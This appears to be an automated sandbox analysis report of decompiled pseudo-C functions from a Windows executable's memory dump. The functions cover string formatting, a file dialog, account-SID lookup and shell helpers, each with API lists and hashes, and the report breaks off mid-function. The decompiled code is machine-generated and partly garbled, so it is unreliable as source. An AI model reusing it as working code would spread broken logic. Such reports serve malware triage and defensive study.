                                                                                                        Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 75%
                                                                                                        			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}























                                                                                                        0x00407362
                                                                                                        0x00407369
                                                                                                        0x0040736e
                                                                                                        0x00407371
                                                                                                        0x00407378
                                                                                                        0x0040737e
                                                                                                        0x00407381
                                                                                                        0x00407386
                                                                                                        0x0040739f
                                                                                                        0x00407388
                                                                                                        0x00407391
                                                                                                        0x00407391
                                                                                                        0x004073a4
                                                                                                        0x004073ac
                                                                                                        0x004073ad
                                                                                                        0x004073cd
                                                                                                        0x004073d0
                                                                                                        0x004073d3
                                                                                                        0x004073d6
                                                                                                        0x004073e0
                                                                                                        0x004073e7
                                                                                                        0x004073ee
                                                                                                        0x004073f5
                                                                                                        0x0040741a
                                                                                                        0x0040741a
                                                                                                        0x0040741d
                                                                                                        0x00407420
                                                                                                        0x00407423
                                                                                                        0x00407426
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004073fc
                                                                                                        0x00407400
                                                                                                        0x0040740f
                                                                                                        0x00407412
                                                                                                        0x00407412
                                                                                                        0x00407402
                                                                                                        0x00407402
                                                                                                        0x00407407
                                                                                                        0x00407407
                                                                                                        0x00407413
                                                                                                        0x00407419
                                                                                                        0x00407419
                                                                                                        0x00407419
                                                                                                        0x0040742f
                                                                                                        0x00407434
                                                                                                        0x00407437
                                                                                                        0x00407439
                                                                                                        0x0040743b
                                                                                                        0x0040743b
                                                                                                        0x0040744e
                                                                                                        0x00407453
                                                                                                        0x00407453
                                                                                                        0x004073af
                                                                                                        0x004073b2
                                                                                                        0x004073ba
                                                                                                        0x004073bb
                                                                                                        0x00000000
                                                                                                        0x004073bd
                                                                                                        0x004073c3
                                                                                                        0x004073c3
                                                                                                        0x004073bb
                                                                                                        0x0040745c
                                                                                                        0x00407468
                                                                                                        0x00407468
                                                                                                        0x0040746d
                                                                                                        0x00407473
                                                                                                        0x0040747c
                                                                                                        0x0040748e

                                                                                                        APIs
                                                                                                        • wcschr.MSVCRT ref: 004073A4
                                                                                                        • wcschr.MSVCRT ref: 004073B2
                                                                                                          • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                                          • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: wcschr$memcpywcslen
                                                                                                        • String ID: "
                                                                                                        • API String ID: 1983396471-123907689
                                                                                                        • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                        • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                                        • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                        • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 45%
                                                                                                        			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}













                                                                                                        0x00401676
                                                                                                        0x0040167e
                                                                                                        0x0040168a
                                                                                                        0x0040168c
                                                                                                        0x00401690
                                                                                                        0x00401691
                                                                                                        0x00401696
                                                                                                        0x0040169d
                                                                                                        0x004016a2
                                                                                                        0x004016aa
                                                                                                        0x004016aa
                                                                                                        0x004016aa
                                                                                                        0x004016ad
                                                                                                        0x004016ae
                                                                                                        0x004016b3
                                                                                                        0x004016b9
                                                                                                        0x004016bb
                                                                                                        0x004016bc
                                                                                                        0x004016c1
                                                                                                        0x004016c8
                                                                                                        0x004016cd
                                                                                                        0x004016ce
                                                                                                        0x004016ea
                                                                                                        0x004016ff
                                                                                                        0x0040170c
                                                                                                        0x004016d0
                                                                                                        0x004016e3
                                                                                                        0x004016e3
                                                                                                        0x00401711
                                                                                                        0x00401714
                                                                                                        0x00000000
                                                                                                        0x00401719
                                                                                                        0x0040171c

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintf
                                                                                                        • String ID: Line%d$Lines
                                                                                                        • API String ID: 3988819677-2790224864
                                                                                                        • Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                                        • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                                        • Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                                        • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 70%
                                                                                                        			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}













                                                                                                        0x00405132
                                                                                                        0x00405135
                                                                                                        0x00405139
                                                                                                        0x0040513e
                                                                                                        0x00405141
                                                                                                        0x004051b3
                                                                                                        0x00405143
                                                                                                        0x00405145
                                                                                                        0x00405147
                                                                                                        0x0040514c
                                                                                                        0x0040514e
                                                                                                        0x00405151
                                                                                                        0x00405151
                                                                                                        0x0040515b
                                                                                                        0x0040515c
                                                                                                        0x0040515d
                                                                                                        0x0040515e
                                                                                                        0x0040515f
                                                                                                        0x00405168
                                                                                                        0x00405169
                                                                                                        0x00405171
                                                                                                        0x00405173
                                                                                                        0x00405174
                                                                                                        0x00405182
                                                                                                        0x00405184
                                                                                                        0x00405189
                                                                                                        0x0040518c
                                                                                                        0x00405194
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405196
                                                                                                        0x0040519a
                                                                                                        0x0040519b
                                                                                                        0x004051a1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004051a1
                                                                                                        0x004051a3
                                                                                                        0x004051a3
                                                                                                        0x004051a6
                                                                                                        0x004051af
                                                                                                        0x004051b0
                                                                                                        0x004051b7

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintfmemcpy
                                                                                                        • String ID: %2.2X
                                                                                                        • API String ID: 2789212964-323797159
                                                                                                        • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                        • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                                        • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                        • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 43%
                                                                                                        			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}









                                                                                                        0x004075bb
                                                                                                        0x004075c2
                                                                                                        0x004075c7
                                                                                                        0x004075ca
                                                                                                        0x004075cd
                                                                                                        0x004075d8
                                                                                                        0x004075e9
                                                                                                        0x004075fc
                                                                                                        0x00407600
                                                                                                        0x00407601
                                                                                                        0x00407606
                                                                                                        0x00407609
                                                                                                        0x0040760e
                                                                                                        0x00407619
                                                                                                        0x0040761e
                                                                                                        0x0040761f
                                                                                                        0x00407624
                                                                                                        0x00407636

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintf
                                                                                                        • String ID: %%-%d.%ds
                                                                                                        • API String ID: 3988819677-2008345750
                                                                                                        • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                        • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                                        • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                        • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}















                                                                                                        0x00405080
                                                                                                        0x00405086
                                                                                                        0x0040508b
                                                                                                        0x0040508e
                                                                                                        0x00405091
                                                                                                        0x00405097
                                                                                                        0x0040509d
                                                                                                        0x004050a4
                                                                                                        0x004050ab
                                                                                                        0x004050b2
                                                                                                        0x004050b5
                                                                                                        0x004050bc
                                                                                                        0x004050cb
                                                                                                        0x004050e0
                                                                                                        0x004050cd
                                                                                                        0x004050d1
                                                                                                        0x004050dc
                                                                                                        0x004050dc

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FileNameOpenwcscpy
                                                                                                        • String ID: L
                                                                                                        • API String ID: 3246554996-2909332022
                                                                                                        • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                        • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                                        • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                        • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 58%
                                                                                                        			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}







                                                                                                        0x00409072
                                                                                                        0x00409074
                                                                                                        0x0040907d
                                                                                                        0x00409086
                                                                                                        0x0040908e
                                                                                                        0x004090a5
                                                                                                        0x004090a5
                                                                                                        0x0040908e
                                                                                                        0x004090ac

                                                                                                        APIs
                                                                                                        • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc
                                                                                                        • String ID: LookupAccountSidW$Y@
                                                                                                        • API String ID: 190572456-2352570548
                                                                                                        • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                        • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                                        • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                        • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 37%
                                                                                                        			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}







                                                                                                        0x0040ad8c
                                                                                                        0x0040ad93
                                                                                                        0x0040ad95
                                                                                                        0x0040ad9d
                                                                                                        0x0040ada5
                                                                                                        0x0040adb2
                                                                                                        0x0040adb2
                                                                                                        0x0040adb5
                                                                                                        0x0040adbf

                                                                                                        APIs
                                                                                                          • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                          • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                          • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                          • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                        • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                                        • String ID: shlwapi.dll
                                                                                                        • API String ID: 4092907564-3792422438
                                                                                                        • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                        • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                                                        • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                        • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}





                                                                                                        0x00406597
                                                                                                        0x00406598
                                                                                                        0x004065a0
                                                                                                        0x004065aa
                                                                                                        0x004065ac
                                                                                                        0x004065ac
                                                                                                        0x004065bd

                                                                                                        APIs
                                                                                                          • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                        • wcsrchr.MSVCRT ref: 004065A0
                                                                                                        • wcscat.MSVCRT ref: 004065B6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FileModuleNamewcscatwcsrchr
                                                                                                        • String ID: _lng.ini
                                                                                                        • API String ID: 383090722-1948609170
                                                                                                        • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                        • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                                                        • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                        • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                                                        0x0040ac59
                                                                                                        0x0040ac60
                                                                                                        0x0040ac68
                                                                                                        0x0040ac6d
                                                                                                        0x0040ac75
                                                                                                        0x0040ac7b
                                                                                                        0x00000000
                                                                                                        0x0040ac7b
                                                                                                        0x0040ac6d
                                                                                                        0x0040ac80

                                                                                                        APIs
                                                                                                          • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                          • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                          • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                          • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                        • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                        • API String ID: 946536540-880857682
                                                                                                        • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                        • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                                        • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                        • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 90%
                                                                                                        			E00406670(char** __esi, void* __eflags) {
				char* _t30;
